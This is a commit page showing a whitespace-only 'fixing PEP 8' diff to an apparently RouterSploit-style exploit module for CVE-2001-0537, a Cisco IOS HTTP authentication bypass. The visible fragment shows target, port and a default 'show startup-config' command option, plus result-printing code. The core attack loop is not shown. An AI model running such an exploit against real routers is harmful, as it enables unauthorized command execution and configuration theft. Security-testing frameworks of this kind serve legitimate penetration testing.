Commit a28aa3b3 by Renos Stoikos Committed by GitHub

fixing PEP 8

fixing PEP 8
parent 097491e4
...@@ -24,7 +24,7 @@ class Exploit(exploits.Exploit): ...@@ -24,7 +24,7 @@ class Exploit(exploits.Exploit):
'to bypass authentication and execute arbitrary commands, ' 'to bypass authentication and execute arbitrary commands, '
'when local authorization is being used, by specifying a high access level in the URL.', 'when local authorization is being used, by specifying a high access level in the URL.',
'authors': [ 'authors': [
'Author', 'renos stoikos <rstoikos[at]gmail.com>'# routesploit module 'Author', 'renos stoikos <rstoikos[at]gmail.com>' #routesploit module
], ],
'references': [ 'references': [
'http://www.cvedetails.com/cve/cve-2001-0537', 'http://www.cvedetails.com/cve/cve-2001-0537',
...@@ -34,8 +34,8 @@ class Exploit(exploits.Exploit): ...@@ -34,8 +34,8 @@ class Exploit(exploits.Exploit):
], ],
} }
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) #target address
port = exploits.Option(80, 'Target port') # default port port = exploits.Option(80, 'Target port') #default port
show_command = exploits.Option('show startup-config', 'Command to be executed e.g show startup-config') show_command = exploits.Option('show startup-config', 'Command to be executed e.g show startup-config')
access_level = None access_level = None
...@@ -62,4 +62,3 @@ class Exploit(exploits.Exploit): ...@@ -62,4 +62,3 @@ class Exploit(exploits.Exploit):
print re.sub('<[^<]+?>', '', response.text) print re.sub('<[^<]+?>', '', response.text)
else: else:
print_error("Exploit failed - target seems to be not vulnerable") print_error("Exploit failed - target seems to be not vulnerable")
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment